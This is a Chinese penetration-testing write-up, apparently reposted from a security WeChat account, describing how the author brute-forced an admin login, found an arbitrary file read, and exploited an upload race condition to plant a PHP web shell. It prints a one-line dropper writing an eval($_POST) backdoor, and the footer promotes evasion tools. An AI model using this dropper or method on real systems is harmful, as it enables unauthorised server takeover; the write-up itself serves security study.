文件读取+条件竞争拿下GetShell | 干货
2023-5-21 22:50:2 Author: 渗透安全团队(查看原文) 阅读量:30 收藏

前提

最近在测一个第三方网站,同时被告知这个第三方网站没有安全,那我心想这不是稳了,可以早点拿到权限交差。可整个过程下来还是有点曲折的。

Getshell过程

信息收集

按照惯例,拿到目标以后先来一波信息收集。用工具一顿扫描,拿到了一些域名和IP。

端口测试

用nmap扫描了一波IP,看到开了ssh端口,感觉有戏,拿出了我珍藏好久的字典就开始爆破,结果爆破了个寂寞,没想到他们安全意识还挺高竟然没有使用弱密码,这不像是没有安全的公司啊。

1683855972_645d9a6479b13619f92f4.png!small?1683855973051

其它的端口暂时没有发现什么有价值的,这条路暂时走不通,只能换条路子了。拿到的域名中看到有几个后台,看看能不能从这里找到突破口。

web测试

打开后台登录页面发现是通过手机号进行登录的,那么常规的用户字典就没有什么用处了,只能再去收集跟他们公司有关的手机号,再去尝试。

1683812899_645cf2230e1aa483e1ba8.png!small?1683812894818

从他们公司官网,爱企查等网站收集了一波手机号,由于没有使用验证码,那就直接开始爆破。有一个手机号使用了弱密码,成功登录后台,看到了胜利的希望。

1683812929_645cf241d466d9d9d5f69.png!small?1683812925639

简单浏览了一下后台功能,发现了几个上传点。在测试第一个的时候就发现了一个问题,他们上传是上传到OSS中的,那么通过上传这条路拿shell可能也走不通了,把上传全部看了一遍,结果都是这样。这让我严重怀疑他们真的没有安全人员嘛?

接下来又认真看了一下其它功能,在一处下载处发现了一个任意文件读取漏洞。然后就想着把刚才有上传功能的文件下载下来看看他们上传的具体逻辑是什么样的。

1683813122_645cf302e7fef89ee6520.png!small?1683813118995

它们上传是先把文件放到本地,然后上传到OSS中,最后删除了本地文件,而且本地文件还是放在web目录内。

1683855999_645d9a7f633fdab830faa.png!small?1683855999978

看到这里,各位可能就知道下一步要怎么去做了,没错,就是利用条件竞争去上传文件。

条件竞争Getshell

针对上传来说,条件竞争有三个利用条件:

1)文件先保存在本地

2)文件名不是随机的,或者有规律可循

3)上传的文件在web目录内

这次遇到的满足上面的条件。因此上传包含下面内容的脚本,并且在删除掉文件前访问到这个文件就可以生成另外一个shell脚本。

<?php fputs(fopen("xxx.php", "w"), '<?php eval($_POST[eeeeeeee]);?>'); ?>

花费了n多分钟,写了一个简单的脚本,用来实现这个过程。看到sucess的时候,就知道脚本已经成功的上传了。

1683813226_645cf36abd6f01e1815fa.png!small?1683813222911

成功的拿到了shell,后面就是提权了,到这里也差不多就可以交差了。

1683856032_645d9aa0b173789db6aa3.png!small?1683856033312

总结

这次的测试主要就是利用任意文件读取+条件竞争得到shell,都是一些比较基本的操作。测试过程中一定要有耐心,如果没有耐心可能测试上传发现都是到OSS的,可能就会直接放弃了。

- END -https://www.freebuf.com/articles/web/366277.html


付费圈子

欢 迎 加 入 星 球 !

代码审计+免杀+渗透学习资源+各种资料文档+各种工具+付费会员

进成员内部群

星球的最近主题和星球内部工具一些展示

加入安全交流群

                               

关 注 有 礼

关注下方公众号回复“666”可以领取一套领取黑客成长秘籍

 还在等什么?赶紧点击下方名片关注学习吧!


干货|史上最全一句话木马

干货 | CS绕过vultr特征检测修改算法

实战 | 用中国人写的红队服务器搞一次内网穿透练习

实战 | 渗透某培训平台经历

实战 | 一次曲折的钓鱼溯源反制

免责声明
由于传播、利用本公众号渗透安全团队所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号渗透安全团队及作者不为承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!
好文分享收藏赞一下最美点在看哦

文章来源: http://mp.weixin.qq.com/s?__biz=MzkxNDAyNTY2NA==&mid=2247505078&idx=2&sn=51b27aec7f486cf95ee99f9dad97e280&chksm=c1762919f601a00f4f874adcf56b48f8466d5ada02d7f84a10e53f62ac30a3442fb3327487b8#rd
如有侵权请联系:admin#unsafe.sh